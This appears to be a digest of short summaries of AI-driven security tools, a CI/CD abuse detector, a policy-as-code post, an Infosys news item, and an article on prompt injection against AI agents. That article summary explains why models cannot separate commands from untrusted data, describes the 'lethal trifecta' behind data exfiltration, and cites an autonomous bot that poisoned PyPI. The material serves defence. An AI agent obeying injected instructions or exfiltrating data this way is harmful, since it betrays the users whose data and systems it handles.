Posts

Visa Vulnerability Agentic Harness (VVAH) - Agentic SAST Pipeline

Visa Vulnerability Agentic Harness (VVAH) is an open-source tool from Visa that uses frontier AI models for autonomous vulnerability discovery in code. Built on lessons from Anthropic's Project Glasswing, it employs a three-phase, nine-stage pipeline that combines threat modeling, multi-agent deterministic voting to reduce false positives, and structured triage to accelerate the path from discovery to fix. The tool supports multiple AI backends (Anthropic Claude, OpenAI) and is designed to be configurable via reusable "skills" for each pipeline stage. It outputs findings in both markdown reports and SARIF format. While findings are AI-generated and require human review, the tool aims to improve the Mean Time to Adapt (MTTA) for security fixes. The project is not accepting external contributions and is intended for authorized use only on owned or permitted code. https://github.com/visa/visa-vulnerability-agentic-harness

AI Deep SAST - LLM-powered deep static analysis for CI/CD

AI Deep SAST is an open-source tool from Cisco that combines traditional static analysis (Semgrep) with LLM-based vulnerability detection for CI/CD pipelines. It offers two scan modes: **fast scan** (Semgrep + local Foundation-Sec-8B model, ~5 min) and **deep scan** (tree-sitter indexing + frontier LLMs like GPT-4o or Claude, ~30 min–14 hr). Features include OWASP Top 10 mapping, CWE mapping, CVSS scoring, attack vectors, remediation code, and defence-in-depth recommendations. The tool uses smart LLM skipping for deterministic rules, severity-based filtering, and multiple report formats (Markdown, JSON, JUnit XML). It includes custom secret detection for config files, supports 15 programming languages via tree-sitter, and provides a Jenkins CI/CD pipeline with quality gates. The local fast scan keeps code on-premises (no external API calls), while deep scan sends redacted code to configured LLM providers. Optimised for Apple Silicon with Metal GPU acceleration, it requires ~16 GB RAM a...

Jinn Guard — Enterprise Semantic Firewall

Jinn Guard is an **asynchronous, kernel-aware semantic firewall** that enforces mathematical safety constraints on autonomous AI agents before any tool executes. It intercepts agent intents and validates them through a **Z3 SMT solver pipeline**, checking state transitions and risk ceilings against formalized compliance models. Built for AlphaOS, it operates over UNIX domain sockets and integrates **eBPF kernel telemetry** for zero-trust isolation and anti-replay protection. Key features include HMAC-SHA256 authentication, SO_PEERCRED process identity, per-agent intent allowlists, sequence quotas, replay attack protection, behavioral drift detection, and a hash-chained audit log. Performance benchmarks show ~6,500 decisions/second with median latency of 257 µs. The system blocks 12 attack types (replay, signature forgery, injection, etc.) with zero fail-open. It includes a Python SDK, systemd service, and installer. The repository is a **validated research prototype** (not enterprise-G...

AI Agent Security Hits Its Reckoning: Prompt Injection May Be a Permanent Flaw, Not a Patchable Bug

This article argues that prompt injection in LLM-based agents is a **structural, unpatchable flaw** rather than a temporary bug. Citing OWASP’s June 2026 State of Agentic AI Security report, it explains that language models cannot distinguish trusted commands from untrusted data because all inputs are processed as a single token stream—no architectural privilege boundary exists. The piece highlights real incidents: an autonomous bot (“hackerbot-claw”) poisoning PyPI with backdoored LiteLLM (47,000 downloads) and CVEs like CVE-2026-2256 (MS-Agent RCE), CVE-2026-22708 (Cursor), and malicious MCP servers. It introduces **Simon Willison’s “lethal trifecta”** (private data access + untrusted content exposure + external communication) as the condition enabling data exfiltration, and **Meta’s “Agents Rule of Two”** (an unsupervised agent may hold at most two of three). Defenses are containment-based (least privilege, human-in-the-loop, strict scoping), not cures. Regulatory pressure (DORA, NI...

elastic/cicd-abuse-detector: CI/CD Abuse Detection

This GitHub repository hosts a **prototype CI/CD abuse detector** from Elastic Security Labs. It provides drop-in CI templates that use an LLM (Claude) to detect suspicious changes to pipelines, workflows, and automation configurations – specifically targeting attacks where stolen credentials are used to modify workflows and harvest CI secrets. The detector works by filtering changed CI/CD files, generating per-file diffs, enriching them with regex-based prescreen labels, having an LLM analyze the diff for credential-harvesting threats, then alerting (Slack, issues, Elasticsearch) and optionally failing the PR based on severity thresholds. It includes reference templates for GitHub Actions, GitLab CI, and Azure DevOps. The repository is **not an officially supported Elastic product** – users are expected to fork and customize the templates, prompts, and schemas for their own environment. Documentation covers architecture, threat model, setup per platform, alerting, and testing.  ht...

Policy as Code: From Documents to Machine Intelligence

This blog post argues that traditional static policy documents cannot keep pace with modern multi-cloud, ephemeral, and continuous deployment environments. It presents **Policy as Code (PaC)** as a discipline that transforms policies into machine-readable, version-controlled, continuously enforced and auditable rules. PaC operates across three areas: modernizing policies, embedding validation into development/operations, and enabling continuous assurance. Key enablers include **OSCAL** (for machine-readable control definitions, profiles, and system plans) and **Open Policy Agent (OPA)** (for enforcement using Rego rules). The Compliance-to-Policy (C2P) bridge helps convert existing OSCAL artifacts into enforcement formats. A worked example (MFA for privileged accounts) traces a control from OSCAL catalog through OPA enforcement to evidence generation. The post concludes that **agentic AI** can accelerate PaC adoption by automating policy translation, rule testing, and remediation triag...

Infosys completes CMMI AI maturity pilot assessment

Infosys has completed the CMMI AI Maturity pilot assessment, becoming one of the first organizations globally to do so. Conducted by the CMMI Institute with support from KPMG, the assessment evaluated how large enterprises govern and apply AI across business and engineering environments. The pilot focused on AI-augmented software development, maintenance, testing, and support, assessing productivity, quality, governance, and responsible AI practices. Infosys contributed real-world insights from its large-scale delivery operations (including Infosys Topaz tools) to help refine the framework for enterprise use. The model addresses alignment with business outcomes, consistency, risk management, and accountability in AI-driven decisions. Executives highlighted the milestone as defining responsible, enterprise-grade AI adoption at scale.  https://securitybrief.co.nz/story/infosys-completes-cmmi-ai-maturity-pilot-assessment